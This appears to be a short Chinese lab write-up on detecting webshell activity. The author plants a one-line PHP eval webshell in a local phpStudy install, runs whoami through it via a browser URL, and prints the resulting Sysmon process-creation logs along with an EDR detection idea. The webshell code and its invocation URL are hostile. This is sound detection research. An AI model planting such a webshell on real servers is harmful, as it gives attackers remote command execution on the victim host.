webshell后门中执行交互命令看到的sysmon数据采集和检测
下载phpstudy,链接:https://public.xp.cn/upgrades/phpStudy_64.zip,如下图启动wnmp。
webshell内容:
<?php echo "Your response is: ";?> <?php @eval($_GET['cmd']);?>
写入C:\phpstudy_pro\WWW下的shell.php文件。
浏览器执行命令:
localhost/shell.php?cmd=system(%27whoami%27);
注意有一个;
然后界面返回:
看看sysmon的数据采集:有2条
一条数据是关于system是启动cmd进程:
Process Create: RuleName: - UtcTime: 2022-04-26 08:20:16.986 ProcessGuid: {0bf95bee-ab40-6267-aa07-000000000900} ProcessId: 5512 Image: C:\Windows\System32\cmd.exe FileVersion: 10.0.19041.746 (WinBuild.160101.0800) Description: Windows Command Processor Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: Cmd.Exe CommandLine: cmd.exe /c "whoami" CurrentDirectory: C:\phpstudy_pro\WWW\ User: DESKTOP-92JS9SJ\bonel LogonGuid: {0bf95bee-6815-6267-e29f-050000000000} LogonId: 0x59FE2 TerminalSessionId: 1 IntegrityLevel: High Hashes: MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18 ParentProcessGuid: {0bf95bee-a686-6267-5407-000000000900} ParentProcessId: 3952 ParentImage: C:\phpstudy_pro\Extensions\php\php7.3.4nts\php-cgi.exe ParentCommandLine: ../Extensions/php/php7.3.4nts/php-cgi.exe ParentUser: DESKTOP-92JS9SJ\bonel
另外一条是cmd里启动whoami:
Process Create: RuleName: - UtcTime: 2022-04-26 08:20:17.010 ProcessGuid: {0bf95bee-ab41-6267-ac07-000000000900} ProcessId: 4368 Image: C:\Windows\System32\whoami.exe FileVersion: 10.0.19041.1 (WinBuild.160101.0800) Description: whoami - displays logged on user information Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: whoami.exe CommandLine: whoami CurrentDirectory: C:\phpstudy_pro\WWW\ User: DESKTOP-92JS9SJ\bonel LogonGuid: {0bf95bee-6815-6267-e29f-050000000000} LogonId: 0x59FE2 TerminalSessionId: 1 IntegrityLevel: High Hashes: MD5=A4A6924F3EAF97981323703D38FD99C4,SHA256=1D4902A04D99E8CCBFE7085E63155955FEE397449D386453F6C452AE407B8743,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 ParentProcessGuid: {0bf95bee-ab40-6267-aa07-000000000900} ParentProcessId: 5512 ParentImage: C:\Windows\System32\cmd.exe ParentCommandLine: cmd.exe /c "whoami" ParentUser: DESKTOP-92JS9SJ\bonel
因此,EDR里检测,应该就是检测parent(的partent)进程是否有whoami.